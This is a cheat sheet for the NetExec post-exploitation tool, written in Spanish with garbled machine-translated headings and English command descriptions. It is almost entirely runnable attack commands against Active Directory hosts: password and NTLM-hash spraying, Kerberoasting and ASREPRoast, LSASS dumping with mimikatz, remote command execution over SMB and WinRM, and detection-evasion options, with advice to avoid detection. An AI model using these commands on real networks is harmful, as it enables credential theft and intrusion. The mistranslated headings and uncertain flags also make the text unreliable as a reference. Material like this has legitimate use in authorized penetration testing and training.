NetExec
"Clase de la hoja"
########################################################################################################################################################################################################################################################## Copiar todos los comandos
■/div titulada
NetExec (antes CrackMapExec) es una herramienta post-explotación que ayuda a automatizar la evaluación de la seguridad de las grandes redes Active Directory a través del abuso de protocolo de red y ataques credenciales.
Instalación
| Command |
Description |
pip3 install netexec |
Install NetExec via pip |
pipx install netexec |
Install with pipx (recommended) |
git clone https://github.com/Pennyw0rth/NetExec.git |
Clone from GitHub |
cd NetExec && pip3 install . |
Install from source |
netexec --version |
Check installed version |
netexec --help |
Display help information |
Uso básico
| Command |
Description |
netexec smb 192.168.1.0/24 |
Scan SMB on subnet |
netexec smb 192.168.1.100 -u username -p password |
Authenticate with credentials |
netexec smb 192.168.1.100 -u username -H ntlmhash |
Authenticate with NTLM hash |
netexec smb 192.168.1.100 -u '' -p '' |
Anonymous authentication |
netexec smb targets.txt -u username -p password |
Use target file |
Apoyo al Protocolo
SMB Protocol
| Command |
Description |
netexec smb 192.168.1.100 |
Basic SMB enumeration |
netexec smb 192.168.1.100 --shares |
Enumerate shares |
netexec smb 192.168.1.100 --users |
Enumerate users |
netexec smb 192.168.1.100 --groups |
Enumerate groups |
netexec smb 192.168.1.100 --local-groups |
Enumerate local groups |
netexec smb 192.168.1.100 --sessions |
Enumerate sessions |
netexec smb 192.168.1.100 --disks |
Enumerate disks |
Protocolo de WinRM
| Command |
Description |
netexec winrm 192.168.1.100 -u username -p password |
WinRM authentication |
netexec winrm 192.168.1.100 -u username -p password -x "whoami" |
Execute command |
netexec winrm 192.168.1.100 -u username -p password -X powershell.ps1 |
Execute PowerShell script |
Protocolo de LDAP
| Command |
Description |
netexec ldap 192.168.1.100 -u username -p password |
LDAP authentication |
netexec ldap 192.168.1.100 -u username -p password --users |
Enumerate LDAP users |
netexec ldap 192.168.1.100 -u username -p password --groups |
Enumerate LDAP groups |
netexec ldap 192.168.1.100 -u username -p password --computers |
Enumerate computers |
MSSQL Protocol
| Command |
Description |
netexec mssql 192.168.1.100 -u username -p password |
MSSQL authentication |
netexec mssql 192.168.1.100 -u username -p password -q "SELECT @@version" |
Execute SQL query |
netexec mssql 192.168.1.100 -u username -p password --local-auth |
Local authentication |
Protocolo SSH
| Command |
Description |
netexec ssh 192.168.1.100 -u username -p password |
SSH authentication |
netexec ssh 192.168.1.100 -u username -k id_rsa |
SSH key authentication |
netexec ssh 192.168.1.100 -u username -p password -x "id" |
Execute command |
Métodos de autenticación
Contraseña Autenticación
| Command |
Description |
netexec smb 192.168.1.100 -u username -p password |
Single credential |
netexec smb 192.168.1.100 -u users.txt -p passwords.txt |
Credential lists |
netexec smb 192.168.1.100 -u username -p passwords.txt |
Password spraying |
netexec smb 192.168.1.100 -u users.txt -p password |
User enumeration |
Hash Authentication
| Command |
Description |
netexec smb 192.168.1.100 -u username -H ntlmhash |
NTLM hash |
netexec smb 192.168.1.100 -u username -H lmhash:ntlmhash |
LM:NTLM hash |
netexec smb 192.168.1.100 -u users.txt -H hashes.txt |
Hash lists |
Kerberos Authentication
| Command |
Description |
netexec smb 192.168.1.100 -u username -p password -k |
Kerberos authentication |
netexec smb 192.168.1.100 -u username --use-kcache |
Use Kerberos cache |
netexec smb 192.168.1.100 -u username -p password --kerberos |
Force Kerberos |
Enumeración
Compartir Enumeración
| Command |
Description |
netexec smb 192.168.1.100 --shares |
List shares |
netexec smb 192.168.1.100 --shares -u username -p password |
Authenticated share listing |
netexec smb 192.168.1.100 --spider SHARE |
Spider share contents |
netexec smb 192.168.1.100 --spider SHARE --pattern "*.txt" |
Search for files |
Enumeración del usuario
| Command |
Description |
netexec smb 192.168.1.100 --users |
Enumerate users |
netexec smb 192.168.1.100 --rid-brute |
RID bruteforce |
netexec smb 192.168.1.100 --users --rid-brute 1000-2000 |
RID range |
Group Enumeration
| Command |
Description |
netexec smb 192.168.1.100 --groups |
Enumerate groups |
netexec smb 192.168.1.100 --local-groups |
Local groups |
netexec smb 192.168.1.100 --groups "Domain Admins" |
Specific group |
Computación
| Command |
Description |
netexec ldap 192.168.1.100 --computers |
Enumerate computers |
netexec smb 192.168.1.100 --computers |
SMB computer enumeration |
Ejecución del Mando
SMB Command Execution
| Command |
Description |
netexec smb 192.168.1.100 -u username -p password -x "whoami" |
Execute command |
netexec smb 192.168.1.100 -u username -p password -X script.ps1 |
Execute PowerShell script |
netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec |
Use WMI execution |
netexec smb 192.168.1.100 -u username -p password --exec-method smbexec |
Use SMB execution |
Ejecución del comando WinRM
| Command |
Description |
netexec winrm 192.168.1.100 -u username -p password -x "Get-Process" |
PowerShell command |
netexec winrm 192.168.1.100 -u username -p password -X script.ps1 |
Execute script |
Módulos
Módulos incorporados
| Command |
Description |
netexec smb 192.168.1.100 -M spider_plus |
Enhanced spidering |
netexec smb 192.168.1.100 -M enum_avproducts |
Enumerate AV products |
netexec smb 192.168.1.100 -M gpp_password |
Group Policy Preferences |
netexec smb 192.168.1.100 -M lsassy |
LSASS dumping |
netexec smb 192.168.1.100 -M mimikatz |
Mimikatz execution |
Opciones de módulo
| Command |
Description |
netexec smb 192.168.1.100 -M spider_plus -o READ_ONLY=false |
Module options |
netexec smb 192.168.1.100 -M lsassy -o BLOODHOUND=true |
Bloodhound output |
Operaciones de base de datos
| Command |
Description |
netexec smb 192.168.1.100 --users --export users.csv |
Export to CSV |
netexec db |
Database management |
netexec db --workspace default |
Set workspace |
netexec db --clear-database |
Clear database |
Características avanzadas
Crédential Stuffing
| Command |
Description |
netexec smb targets.txt -u users.txt -p passwords.txt --continue-on-success |
Continue on success |
netexec smb targets.txt -u users.txt -p passwords.txt --fail-limit 3 |
Fail limit |
Política de contraseña
| Command |
Description |
netexec smb 192.168.1.100 --pass-pol |
Get password policy |
netexec ldap 192.168.1.100 --pass-pol |
LDAP password policy |
Integración sanguínea
| Command |
Description |
netexec ldap 192.168.1.100 -u username -p password --bloodhound |
Collect Bloodhound data |
netexec ldap 192.168.1.100 -u username -p password --bloodhound -c All |
All collections |
ASREPRoast
| Command |
Description |
netexec ldap 192.168.1.100 -u users.txt --asreproast asrep.txt |
ASREPRoast attack |
netexec ldap 192.168.1.100 -u username -p password --asreproast asrep.txt |
Authenticated ASREPRoast |
Kerberoasting
| Command |
Description |
netexec ldap 192.168.1.100 -u username -p password --kerberoasting kerb.txt |
Kerberoasting attack |
Output and Logging
| Command |
Description |
netexec smb 192.168.1.100 --verbose |
Verbose output |
netexec smb 192.168.1.100 --debug |
Debug output |
netexec smb 192.168.1.100 -o output.txt |
Save output to file |
netexec smb 192.168.1.100 --log logs/ |
Log directory |
Configuración
Config File (~/.nxc/nxc.conf)
[nxc]
workspace = default
last_used_db = ~/.nxc/workspaces/default/nxc.db
pwn3d_label = Pwn3d!
audit_mode = False
reveal_chars_of_pwd = 0
Opciones específicas del Protocolo
| Command |
Description |
netexec smb 192.168.1.100 --port 445 |
Custom port |
netexec smb 192.168.1.100 --timeout 5 |
Connection timeout |
netexec smb 192.168.1.100 --threads 100 |
Thread count |
Técnicas de evacuación
| Command |
Description |
netexec smb 192.168.1.100 --jitter 1-5 |
Random delay |
netexec smb 192.168.1.100 --delay 2 |
Fixed delay |
netexec smb 192.168.1.100 --obfs |
Obfuscation |
Escenarios de ataque comunes
Domain Enumeration
# Basic domain enumeration
netexec smb dc.domain.com -u username -p password --users --groups --computers
# Share enumeration
netexec smb 192.168.1.0/24 -u username -p password --shares
# Password policy
netexec smb dc.domain.com -u username -p password --pass-pol
Ataques credenciales
# Password spraying
netexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success
# Hash spraying
netexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76
# ASREPRoast
netexec ldap dc.domain.com -u users.txt --asreproast asrep_hashes.txt
Post-Explotación
# Command execution
netexec smb 192.168.1.100 -u username -p password -x "net user /domain"
# LSASS dumping
netexec smb 192.168.1.100 -u username -p password -M lsassy
# Bloodhound collection
netexec ldap dc.domain.com -u username -p password --bloodhound -c All
Integración con otras herramientas
Impacket Integration
| Command |
Description |
netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec |
Use Impacket WMI |
netexec smb 192.168.1.100 -u username -p password --exec-method smbexec |
Use Impacket SMB |
Crackmapexec Migración
| Command |
Description |
netexec --convert-cme-db |
Convert CME database |
alias cme='netexec' |
Create alias for compatibility |
Solución de problemas
| Command |
Description |
netexec --help |
General help |
netexec smb --help |
Protocol-specific help |
netexec -v |
Version information |
netexec --debug smb 192.168.1.100 |
Debug mode |
Buenas prácticas
- Use autenticación antes de la enumeración cuando sea posible
- Implementar retrasos adecuados para evitar la detección
- Utilice espacios de trabajo para organizar diferentes compromisos
- Resultados de las exportaciones para un mayor análisis
- Combinar con otros instrumentos para una evaluación integral
- Monitor para respuestas defensivas
- Utilice los recuentos de hilo apropiados para evitar objetivos abrumadores
- Implementar registros adecuados para la documentación
- Validar credenciales antes de ataques a gran escala
- Use técnicas de obfuscación cuando sea necesario
Consideraciones de seguridad
- Únicamente uso en redes autorizadas
- Implementar controles adecuados de acceso
- Monitor for detection by security tools
- Utilizar principios mínimos de privilegio
- Document all activities for compliance
- Coordinar con equipo azul cuando sea aplicable
- Implementar procedimientos adecuados de limpieza
- Sus credenciales de almacenamiento de forma segura
- Utilice la comunicación encriptada cuando sea posible
- Actualizaciones periódicas para mantener la eficacia